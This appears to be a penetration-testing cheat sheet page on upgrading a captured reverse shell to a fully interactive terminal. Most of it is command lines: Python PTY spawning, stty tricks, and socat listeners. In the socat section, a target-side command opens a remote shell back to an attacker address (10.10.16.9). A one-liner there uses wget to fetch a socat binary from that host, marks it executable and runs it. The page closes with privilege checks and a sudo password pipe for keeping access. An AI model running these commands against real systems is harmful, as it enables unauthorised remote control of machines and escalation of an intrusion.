Upgrade Shells to Fully Interactive

Upgrading the shell to a fully interactive one

Upgrading shells is a crucial step after gaining initial access to a target system. A fully interactive shell provides better stability, functionality, and usability for post-exploitation activities.

Basic Python PTY Method

The most common and reliable method uses Python's PTY module:

# Python 2
python -c 'import pty; pty.spawn("/bin/bash")'

# Python 3
python3 -c 'import pty; pty.spawn("/bin/bash")'

This creates a partially upgraded shell but lacks full terminal functionality.

Complete TTY Shell Upgrade

The full process involves four steps:

Step 1: Get a Basic Shell with Python

python3 -c 'import pty; pty.spawn("/bin/bash")'

Step 2: Background the Shell

# Press Ctrl+Z to background the session

Step 3: Configure Local Terminal Settings

# In your local terminal
stty raw -echo
fg

Note: After typing fg, press Enter twice

Step 4: Configure Remote Terminal Settings

# In the remote shell
export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 116

The terminal dimensions (rows 38 columns 116) should match your local terminal, which you can find with:

# Check your local terminal dimensions
stty size

Alternative Methods

Using Socat for Full TTY

First, transfer the socat binary to the target system. Then:

# On your attack machine
socat file:`tty`,raw,echo=0 tcp-listen:4445

# On the target
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.16.9:4445

For targets without socat installed:

# Transfer socat and create connection in one line
wget -q http://10.10.16.9:9090/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.16.9:4445

Using Script Utility

# Another method for shell upgrade
script /dev/null -c bash

Common Issues and Solutions

No Python Available

If Python isn't available, try:

# Using script
script /dev/null -c bash

# Using expect
expect -c 'spawn bash; interact'

# Using perl
perl -e 'exec "/bin/bash";'

Resetting Terminal After Failed Upgrade

If your terminal display becomes corrupted:

# Type blindly
reset

TTY Settings on Different Shells

For non-bash shells:

# For zsh
export SHELL=zsh
export TERM=xterm-256color

# For sh (more limited)
export TERM=xterm

Testing Shell Functionality

After upgrading, verify the shell functionality:

# Test command history
press up arrow to view previous commands

# Test tab completion
ls /etc/[press Tab]

# Test job control
sleep 5 &
jobs

# Test signal handling
press Ctrl+C to stop a running command

Maintaining Access

Once you have an interactive shell, consider:

# Checking current user privileges
sudo -l

# Setting up a more persistent access method
echo "your_password" | sudo -S -i
PreviousShellsNextLog-in Brute Forcing

Last updated